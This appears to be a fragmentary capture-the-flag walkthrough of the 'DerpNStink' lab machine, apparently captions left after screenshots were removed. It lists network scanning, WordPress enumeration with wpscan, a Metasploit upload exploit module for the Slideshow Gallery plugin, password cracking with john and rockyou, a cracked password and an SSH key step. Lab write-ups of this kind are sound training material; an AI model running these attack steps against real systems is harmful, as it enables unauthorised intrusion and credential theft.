netdiscover -r 10.0.9.0/24
NMAP -A -T3 10.0.9.129
dirb http://10.0.9.129
dirb http://10.0.9.129
ftp://10.0.9.129
ftp 10.0.9.129
ssh root@10.0.9.129
Key !! we need a key
wpscan --url http://derpnstink.local/weblog/ --enumerate p --enumerate t --enumerate u --enumerate tt
wpscan --url http://derpnstink.local/weblog/ --enumerate p --enumerate t --enumerate u --enumerate tt
wpscan --url http://derpnstink.local/weblog/ --enumerate p --enumerate t --enumerate u --enumerate tt
Users and Password of one
search Slideshow Gallery
exploit/unix/webapp/wp_slideshowgallery_upload
All options set
All options set
All options set
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
http://derpnstink.local/weblog/wp-login.php
http://derpnstink.local/weblog/wp-login.php
Now Escalate
Now Escalate
Now Escalate
Now Escalate
Now Escalate
Now ENUM
Now ENUM
Now ENUM
wedgie57
Now ENUM
Now ENUM
and chmod 400 stinky.key
Now ENUM
Now ENUM on the PCAP
http.request.method == POST
MR derp GOT PWNED
LETS GET ROOT !
YOU GOT PWNED
Thank you Thank you!!!